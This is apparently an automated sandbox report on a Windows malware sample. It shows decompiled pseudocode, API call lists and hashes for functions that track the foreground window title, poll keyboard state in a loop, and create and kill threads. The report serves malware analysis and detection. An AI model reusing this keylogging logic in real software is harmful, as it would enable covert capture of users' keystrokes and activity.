					_t12 = GetTickCount();
					_push(0);
					_push(_t12);
					_t3 = _t22 + 0x12c; // 0x12c
					_t13 = _t3;
					asm("cdq");
					if(0 != _v36) {
						goto L5;
					}
					L3:
					_t40 = _t13 -  *_t36;
					if(_t40 >= 0) {
						continue;
						do {
							while(1) {
								Sleep(1); // executed
								E2401794C( &_v8, _t22, _t23, 0x24063304, 0x2406330c); // executed
								E240130DC(0x2406330c, _v8);
								E2405038C(_t22, 0x24063304, 0x2406330c);
								_t12 = GetTickCount();
								_push(0);
								_push(_t12);
								_t3 = _t22 + 0x12c; // 0x12c
								_t13 = _t3;
								asm("cdq");
								if(0 != _v36) {
									goto L5;
								}
								goto L3;
							}
							goto L5;
							L6:
							E24013480( *0x24063304,  *0x2406330c);
						} while (_t40 == 0);
						_t41 =  *0x24063308 - 1;
						if( *0x24063308 == 1) {
							E24052240(_t22, 0x24063304, 0x2406330c, _t41);
							 *0x24063308 = 0;
						}
						E240130DC(0x24063304,  *0x2406330c);
						_t22 = GetTickCount();
						continue;
					}
					goto L6;
					L5:
					if(__eflags >= 0) {
						continue;
					}
					goto L6;
				}
			}












                                    0x24052460
                                    0x24052462
                                    0x24052467
                                    0x24052469
                                    0x24052478
                                    0x24052479
                                    0x2405247e
                                    0x24052481
                                    0x24052484
                                    0x24052486
                                    0x2405248e
                                    0x24052498
                                    0x2405249d
                                    0x240524a2
                                    0x240524a9
                                    0x240524aa
                                    0x240524ab
                                    0x240524ab
                                    0x240524b1
                                    0x240524b6
                                    0x00000000
                                    0x00000000
                                    0x240524b8
                                    0x240524b8
                                    0x240524bd
                                    0x00000000
                                    0x24052484
                                    0x24052484
                                    0x24052486
                                    0x2405248e
                                    0x24052498
                                    0x2405249d
                                    0x240524a2
                                    0x240524a9
                                    0x240524aa
                                    0x240524ab
                                    0x240524ab
                                    0x240524b1
                                    0x240524b6
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x240524b6
                                    0x00000000
                                    0x240524c5
                                    0x240524c9
                                    0x240524c9
                                    0x240524d0
                                    0x240524d7
                                    0x240524d9
                                    0x240524de
                                    0x240524de
                                    0x240524e9
                                    0x240524f3
                                    0x00000000
                                    0x240524f3
                                    0x00000000
                                    0x240524c1
                                    0x240524c3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x240524c3

                                    APIs
                                    • Sleep.KERNEL32(00000001,00000000,2405250D,?,?,?,?,00000000), ref: 24052486
                                      • Part of subcall function 2401794C: GetForegroundWindow.USER32(00000000,240179B9,?,24063304,2406330C,?,00000000,?,24052493,00000001,00000000,2405250D), ref: 2401796B
                                      • Part of subcall function 2401794C: GetWindowTextLengthA.USER32(00000000), ref: 24017977
                                      • Part of subcall function 2401794C: GetWindowTextA.USER32(00000000,00000000,00000001), ref: 24017994
                                      • Part of subcall function 2405038C: GetAsyncKeyState.USER32(00000008), ref: 240503C9
                                      • Part of subcall function 2405038C: GetKeyState.USER32(00000014), ref: 240503EC
                                      • Part of subcall function 2405038C: GetKeyState.USER32(00000010), ref: 240503F9
                                    • GetTickCount.KERNEL32 ref: 240524A2
                                    • GetTickCount.KERNEL32 ref: 240524EE
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: StateWindow$CountTextTick$AsyncForegroundLengthSleep
                                    • String ID:
                                    • API String ID: 3649555911-0
                                    • Opcode ID: 56e882d13cfdc5414056da230572404680f467836f3930c0d3be041606eaf96f
                                    • Instruction ID: d1162dd9223b267aebf286926134ab69d4ac6f0e86b7daeeebff8111f733a11d
                                    • Opcode Fuzzy Hash: 56e882d13cfdc5414056da230572404680f467836f3930c0d3be041606eaf96f
                                    • Instruction Fuzzy Hash: 9101B930204150EFF702DBA5C890A5E7BD8FF99754F2044A9E4455F129CAB19EC58EE2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2401794C, Relevance: 4.5, APIs: 3, Instructions: 43COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E2401794C(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v8;
				struct HWND__* _t9;
				struct HWND__* _t22;
				intOrPtr _t26;
				void* _t30;
				int _t33;
				intOrPtr _t36;

				_push(0);
				_t30 = __eax;
				_push(_t36);
				_push(0x240179b9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				E24013088(__eax); // executed
				_t9 = GetForegroundWindow(); // executed
				_t22 = _t9;
				if(_t22 != 0) {
					_t33 = GetWindowTextLengthA(_t22) + 1;
					E240136BC( &_v8, _t33);
					GetWindowTextA(_t22, E24013534(_v8), _t33);
					E2401790C(_v8, _t30);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E240179C0);
				return E24013088( &_v8);
			}










                                    0x2401794f
                                    0x24017954
                                    0x24017958
                                    0x24017959
                                    0x2401795e
                                    0x24017961
                                    0x24017966
                                    0x2401796b
                                    0x24017970
                                    0x24017974
                                    0x2401797e
                                    0x24017984
                                    0x24017994
                                    0x2401799e
                                    0x2401799e
                                    0x240179a5
                                    0x240179a8
                                    0x240179ab
                                    0x240179b8

                                    APIs
                                    • GetForegroundWindow.USER32(00000000,240179B9,?,24063304,2406330C,?,00000000,?,24052493,00000001,00000000,2405250D), ref: 2401796B
                                    • GetWindowTextLengthA.USER32(00000000), ref: 24017977
                                    • GetWindowTextA.USER32(00000000,00000000,00000001), ref: 24017994
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Window$Text$ForegroundLength
                                    • String ID:
                                    • API String ID: 1471897267-0
                                    • Opcode ID: 6ef0ae46ab523d1d319b6f741911aa39b2de34215fb8f510f160de2ee3379a1a
                                    • Instruction ID: 1f6c2f9f1c5c4e4ccece54c0928ec55157105647c4883a3bd8a068302e791fcf
                                    • Opcode Fuzzy Hash: 6ef0ae46ab523d1d319b6f741911aa39b2de34215fb8f510f160de2ee3379a1a
                                    • Instruction Fuzzy Hash: B0F096716106447BFB02A675DC91D5EB7DDDB96554B910071F808E3208DAB4AF448564
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05090000, Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNELBASE(?), ref: 05090018
                                    • RtlExitUserThread.NTDLL(00000000), ref: 05090023
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621887139.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false
                                    Similarity
                                    • API ID: ExitHandleModuleThreadUser
                                    • String ID:
                                    • API String ID: 3752825402-0
                                    • Opcode ID: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction ID: 31f55fc70ad1d22fff56d4cf632896c20d063e432f342e22e3eed41fb45fc377
                                    • Opcode Fuzzy Hash: 46ff59f967ff6d5f8062231f6615e391b4eae6b59b37df9d4a5e4cea238d21c4
                                    • Instruction Fuzzy Hash: 5EE0B676D00118ABCB109AE9DC088DFBB7DEF45221B000662B915F2110DB715A109AA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240178C4, Relevance: 3.0, APIs: 2, Instructions: 21threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E240178C4(_Unknown_base(*)()* __eax, long __ecx, int __edx) {
				void* _t4;
				void* _t7;
				void* _t8;
				int _t13;
				DWORD* _t15;

				 *__eax = __eax +  *__eax;
				 *((intOrPtr*)(_t7 + 0x56)) =  *((intOrPtr*)(_t7 + 0x56)) + __edx;
				_push(_t7);
				_push(__ecx);
				_t13 = __edx;
				_t4 = CreateThread(0, 0, __eax, 0, __ecx, _t15); // executed
				_t8 = _t4;
				SetThreadPriority(_t8, _t13); // executed
				return _t8;
			}








                                    0x240178c5
                                    0x240178c7
                                    0x240178c8
                                    0x240178ca
                                    0x240178cb
                                    0x240178d6
                                    0x240178db
                                    0x240178df
                                    0x240178e9

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00042464,00000000,00000000), ref: 240178D6
                                    • SetThreadPriority.KERNEL32(00000000,00000000,00000000,?,?,24052534), ref: 240178DF
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Thread$CreatePriority
                                    • String ID:
                                    • API String ID: 2610526550-0
                                    • Opcode ID: 61bb2c7c535dddc69725e08d5f89bd8f97d57c9ece6b52f4b021e6be42d572b0
                                    • Instruction ID: f067ca7646760172a42d2ce95e04ed8e178e153a7ea5017d4231b86e866a64a5
                                    • Opcode Fuzzy Hash: 61bb2c7c535dddc69725e08d5f89bd8f97d57c9ece6b52f4b021e6be42d572b0
                                    • Instruction Fuzzy Hash: D7D0C9A138E3903FF71552A52C82FBB1A0CCB82669F2402AABA1C9E1C6C0846C0852B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240178C8, Relevance: 3.0, APIs: 2, Instructions: 20threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 79%
                                    			E240178C8(_Unknown_base(*)()* __eax, long __ecx, int __edx) {
				void* _t2;
				void* _t5;
				int _t9;
				DWORD* _t10;

				_push(__ecx);
				_t9 = __edx;
				_t2 = CreateThread(0, 0, __eax, 0, __ecx, _t10); // executed
				_t5 = _t2;
				SetThreadPriority(_t5, _t9); // executed
				return _t5;
			}







                                    0x240178ca
                                    0x240178cb
                                    0x240178d6
                                    0x240178db
                                    0x240178df
                                    0x240178e9

                                    APIs
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00042464,00000000,00000000), ref: 240178D6
                                    • SetThreadPriority.KERNEL32(00000000,00000000,00000000,?,?,24052534), ref: 240178DF
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Thread$CreatePriority
                                    • String ID:
                                    • API String ID: 2610526550-0
                                    • Opcode ID: b90d59c1ece38c85e66cc4d89c17127a835bff16823114e983e9d7694cf179ae
                                    • Instruction ID: aef8762a0d873128f918a3c20f786550bfc9aa2afeb29080f16a316379f761c2
                                    • Opcode Fuzzy Hash: b90d59c1ece38c85e66cc4d89c17127a835bff16823114e983e9d7694cf179ae
                                    • Instruction Fuzzy Hash: CBD04CF235A2203EF62412A67C86FBB494CCBD57BDF205279B61C9E2C5D4816C4451F5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04EB0000, Relevance: 3.0, APIs: 2, Instructions: 16sleeplibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 04EB001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 04EB0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.620799125.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: cced881d7e076ddb83b870002673f0bf113c93167b8887f10267e9765c957dd3
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 2FE00A74D04608EFCB04DF99C54889EBBB5AF49320B25C295E865973A5D730AE419A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 051B0000, Relevance: 3.0, APIs: 2, Instructions: 16sleeplibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 051B001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 051B0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622217193.00000000051B0000.00000040.00000001.sdmp, Offset: 051B0000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 1e1a1fa6e66503b13a795122efded7bc6e90cb03228b4090ec6ab2fe1322312e
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 30E00A74D04608EFCB14DF99C54889DBBB5AF49320B25C295E865973A5D7309E419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 059A0000, Relevance: 3.0, APIs: 2, Instructions: 16sleeplibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 059A001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 059A0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.623869692.00000000059A0000.00000040.00000001.sdmp, Offset: 059A0000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: ce4926d0c121923cea884fb9f2792c35c91d2c92609bc78dd9bf87301a41fd36
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 59E09A74D00608EFCB04CF99C44888DBBB5AF48320B20C291E825973A5D7309E41DA80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 04FD0000, Relevance: 3.0, APIs: 2, Instructions: 16sleeplibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 04FD001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 04FD0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621639734.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 9166b1db9a78641e4b14d42254fe4d6abd78009e99f4b5b67f80966e26dddc98
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 2AE00A74D04608EFCB04DF99C54889DBBB5AF49320F25C295E865973A5D730AE419A40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 050C0000, Relevance: 3.0, APIs: 2, Instructions: 16sleeplibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 050C001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 050C0026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.621934626.00000000050C0000.00000040.00000001.sdmp, Offset: 050C0000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: 00e0fe9d888f4cd2ed0eaf47a2850e1ad25a1186c38e5896d6d6211723e36375
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 2FE00274D04608EFCB04DF99C98889DBBB5AF89320F25C295E865A73A5D730AE41DA80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 05390000, Relevance: 3.0, APIs: 2, Instructions: 16sleeplibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNELBASE(?), ref: 0539001D
                                    • Sleep.KERNELBASE(FFFFFFFF), ref: 05390026
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.622755155.0000000005390000.00000040.00000001.sdmp, Offset: 05390000, based on PE: false
                                    Similarity
                                    • API ID: LibraryLoadSleep
                                    • String ID:
                                    • API String ID: 2118945035-0
                                    • Opcode ID: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction ID: cb5c5214a2d8c7f3050c44908a5fefd86ddce890cbea8e22385e83c35f3c4df9
                                    • Opcode Fuzzy Hash: aa8963ae1cd73f7bd24b0d0180e87021e78b3d589d0fcefb7e39085448f0c57e
                                    • Instruction Fuzzy Hash: 03E00274D04608EFCB04DF99C98889DBBB5AF89320B25C295E865A73A5D730AE519A80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 240178EC, Relevance: 3.0, APIs: 2, Instructions: 15threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 75%
                                    			E240178EC(void* __eax) {
				void* _t5;
				void* _t7;

				_t7 = __eax;
				TerminateThread(__eax, 1); // executed
				asm("sbb ebx, ebx");
				CloseHandle(_t7);
				return _t5 + 1;
			}





                                    0x240178ee
                                    0x240178f3
                                    0x240178fb
                                    0x240178ff
                                    0x24017908

                                    APIs
                                    • TerminateThread.KERNEL32(00000000,00000001,?,2405B9C4,24038452,00000000,2403847A,?,?,240384EC,?,240384EC,?,?,?,240384EC), ref: 240178F3
                                    • CloseHandle.KERNEL32(00000000,00000000,00000001,?,2405B9C4,24038452,00000000,2403847A,?,?,240384EC,?,240384EC,?,?,?), ref: 240178FF
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleTerminateThread
                                    • String ID:
                                    • API String ID: 2476175854-0
                                    • Opcode ID: 5893ba647653e121ef019f223bc399437da0a54cee20f113e6114f75509b07f9
                                    • Instruction ID: a520300e3a8eddb656dd34bb2fac21e4e9764e02fefaed21613025adbbddcd78
                                    • Opcode Fuzzy Hash: 5893ba647653e121ef019f223bc399437da0a54cee20f113e6114f75509b07f9
                                    • Instruction Fuzzy Hash: C7C09BA23536743DF611296C1CD0EFF414DDF525EEF100776F944D5154C5864D8901E5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016A60, Relevance: 1.6, APIs: 1, Instructions: 53timeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 65%
                                    			E24016A60(void* __eax, void* __ebx, void* __ecx) {
				struct _SYSTEMTIME _v20;
				char _v24;
				char _v28;
				void* _t33;
				void* _t34;
				intOrPtr _t41;
				void* _t47;

				_t34 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_t33 = __eax;
				_push(_t47);
				_push(0x24016aee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47 + 0xffffffe8;
				GetLocalTime( &_v20);
				E240158BC( &_v24, _t34, 0, _v20.wSecond & 0x0000ffff, 0);
				if(E2401333C(_v24) != 1) {
					E240158BC(_t33, _t34, 0, _v20.wSecond & 0x0000ffff, 0); // executed
				} else {
					E240158BC( &_v28, _t34, 0, _v20.wSecond & 0x0000ffff, 0);
					E24013388(_t33, _v28, 0x24016b04);
				}
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E24016AF5);
				return E240130AC( &_v28, 2);
			}










                                    0x24016a60
                                    0x24016a69
                                    0x24016a6c
                                    0x24016a6f
                                    0x24016a73
                                    0x24016a74
                                    0x24016a79
                                    0x24016a7c
                                    0x24016a83
                                    0x24016a93
                                    0x24016aa1
                                    0x24016ace
                                    0x24016aa3
                                    0x24016aae
                                    0x24016abd
                                    0x24016abd
                                    0x24016ad5
                                    0x24016ad8
                                    0x24016adb
                                    0x24016aed

                                    APIs
                                    • GetLocalTime.KERNEL32(?,00000000,24016AEE,?,00000000), ref: 24016A83
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID:
                                    • API String ID: 481472006-0
                                    • Opcode ID: bdaa2702332f1484a244b9dd0b22e1194163d2d43d4aec312b96146b36966224
                                    • Instruction ID: 02c9b6e5572f9378d7c37504dd889ffac2077f20a8fad1a42327021ce7723570
                                    • Opcode Fuzzy Hash: bdaa2702332f1484a244b9dd0b22e1194163d2d43d4aec312b96146b36966224
                                    • Instruction Fuzzy Hash: F1019670A041099FFB01DBA5CC519BFB6FDEFD8704B91C436B408E6254E9349E80C561
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24016A5F, Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 67%
                                    			E24016A5F(void* __eax, void* __ebx, void* __ecx, void* __edx) {
				struct _SYSTEMTIME _v20;
				char _v24;
				char _v28;
				intOrPtr _v117;
				void* _t35;
				void* _t36;
				intOrPtr _t44;
				void* _t50;

				_t36 = __ecx;
				_v117 = _v117 + __edx;
				_v28 = 0;
				_v24 = 0;
				_t35 = __eax;
				_push(_t50);
				_push(0x24016aee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xffffffe8;
				GetLocalTime( &_v20);
				E240158BC( &_v24, _t36, 0, _v20.wSecond & 0x0000ffff, 0);
				if(E2401333C(_v24) != 1) {
					E240158BC(_t35, _t36, 0, _v20.wSecond & 0x0000ffff, 0); // executed
				} else {
					E240158BC( &_v28, _t36, 0, _v20.wSecond & 0x0000ffff, 0);
					E24013388(_t35, _v28, 0x24016b04);
				}
				_pop(_t44);
				 *[fs:eax] = _t44;
				_push(E24016AF5);
				return E240130AC( &_v28, 2);
			}











                                    0x24016a5f
                                    0x24016a5f
                                    0x24016a69
                                    0x24016a6c
                                    0x24016a6f
                                    0x24016a73
                                    0x24016a74
                                    0x24016a79
                                    0x24016a7c
                                    0x24016a83
                                    0x24016a93
                                    0x24016aa1
                                    0x24016ace
                                    0x24016aa3
                                    0x24016aae
                                    0x24016abd
                                    0x24016abd
                                    0x24016ad5
                                    0x24016ad8
                                    0x24016adb
                                    0x24016aed

                                    APIs
                                    • GetLocalTime.KERNEL32(?,00000000,24016AEE,?,00000000), ref: 24016A83
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID:
                                    • API String ID: 481472006-0
                                    • Opcode ID: e9f94ed46a3f5b85e0d0e36e6017f28098cf83d900caa7defc6abb3735950f8c
                                    • Instruction ID: d4e045e2793ec74dbaa2a97c45d513b8a731b2cfb064601b63da47b5f495dcf0
                                    • Opcode Fuzzy Hash: e9f94ed46a3f5b85e0d0e36e6017f28098cf83d900caa7defc6abb3735950f8c
                                    • Instruction Fuzzy Hash: DD0184709041099FFB01CBE5CC51DBFB7FDEBD8704B91857AE408E2694D9349E91C961
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24040DB8, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 37%
                                    			E24040DB8(void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				char _v84;
				struct _SHFILEINFO _v356;
				char _v360;
				intOrPtr _t26;
				void* _t33;

				_v360 = 0;
				_push(_t33);
				_push(0x24040e3f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t33 + 0xfffffe9c;
				E24017038( &_v360);
				SHGetFileInfo(E24013534(_v360), 0,  &_v356, 0x160, 0x400); // executed
				asm("movsd");
				asm("movsb");
				E240122F4(0x2405cc15, 0x50,  &_v84);
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(0x24040e46);
				return E24013088( &_v360);
			}








                                    0x24040dc5
                                    0x24040dcd
                                    0x24040dce
                                    0x24040dd3
                                    0x24040dd6
                                    0x24040df2
                                    0x24040e03
                                    0x24040e12
                                    0x24040e13
                                    0x24040e21
                                    0x24040e28
                                    0x24040e2b
                                    0x24040e2e
                                    0x24040e3e

                                    APIs
                                    • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00000400), ref: 24040E03
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: FileInfo
                                    • String ID:
                                    • API String ID: 4041567068-0
                                    • Opcode ID: 55daa1995822bb6e560317fde2095a6f6a8c8eb3ca28530af70aae0f3cb37aa5
                                    • Instruction ID: 4d12fe45ce0c4572286532c8ef752bfedee2dd097d97dcf5b61a740bb4d05cf4
                                    • Opcode Fuzzy Hash: 55daa1995822bb6e560317fde2095a6f6a8c8eb3ca28530af70aae0f3cb37aa5
                                    • Instruction Fuzzy Hash: F5F0AF309182086FE711DB22CC91FDB7ABCEB49754F8104B4E508E7198D6B2AE80CE60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2401456C, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2401456C(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0x24010000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E240147A8(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0x24010000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				_t7 = _t16 + 0x10; // 0x24010000
				return  *_t7;
			}








                                    0x24014574
                                    0x2401457a
                                    0x24014586
                                    0x2401458a
                                    0x24014593
                                    0x24014598
                                    0x2401459a
                                    0x2401459f
                                    0x240145a1
                                    0x240145a4
                                    0x240145a4
                                    0x2401459f
                                    0x240145a7
                                    0x240145b2

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(24010000,?,00000105), ref: 2401458A
                                      • Part of subcall function 240147A8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 240147C4
                                      • Part of subcall function 240147A8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 240147E2
                                      • Part of subcall function 240147A8: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 24014800
                                      • Part of subcall function 240147A8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 2401481E
                                      • Part of subcall function 240147A8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,240148AD,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 24014867
                                      • Part of subcall function 240147A8: RegQueryValueExA.ADVAPI32(?,24014A14,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,240148AD,?,80000001), ref: 24014885
                                      • Part of subcall function 240147A8: RegCloseKey.ADVAPI32(?,240148B4,00000000,00000000,00000005,00000000,240148AD,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 240148A7
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Open$FileModuleNameQueryValue$Close
                                    • String ID:
                                    • API String ID: 2796650324-0
